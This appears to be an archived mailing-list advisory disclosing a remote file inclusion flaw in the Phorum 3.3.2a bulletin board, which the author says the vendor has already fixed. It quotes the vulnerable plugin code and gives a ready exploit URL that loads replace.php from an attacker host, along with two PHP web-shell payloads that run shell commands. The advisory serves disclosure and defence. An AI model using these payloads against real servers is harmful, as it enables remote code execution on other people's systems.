Phorum 3.3.2a remote command execution

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Target:
Phorum 3.3.2a (prior versions?)

Description:
In Phorum 3.3.2a (a bulletin board) there's a security flaw that lets remote users
include external php scripts and execute arbitary code.

Found by:
Markus Arndt<markus-arndt@web.de>

Vendor:
http://www.phorum.org

Notified Vendor:
Yes, already fixed version available

Details:

After extracting the Phorum 3.3.2a archive we have lots of php files and subfolders.
I just snooped around a bit and found this file vulnerable for remote script inclusion:

./plugin/replace/plugin.php

let's see some code:



	<?php
	include("$PHORUM[settings_dir]/replace.php");

	function mod_replace_read_body ($body) {
	  global $pluginreplace;
	  reset($pluginreplace);
	  while(list($key,$val) = each($pluginreplace)) {
	    $body = str_replace($key,$val,$body);
	  }
	  return $body;
	}

	$plugins["read_body"]["mod_replace"]="mod_replace_read_body";

	?>


Easy one..

http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls

This one will get the file http://[evilhost]/replace.php and execute it.
If [evilhost] has php enabled we could use this one as replace.php:

	<?
	echo("<?
	system(\"\$cmd\");
	?>");
	?>

If it's not php-enabled simply:
	<?
	system("$cmd");
	?>




Markus Arndt<markus-arndt@web.de>
http://skka.de
________________________________________________________________
Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr! 
Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13



[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux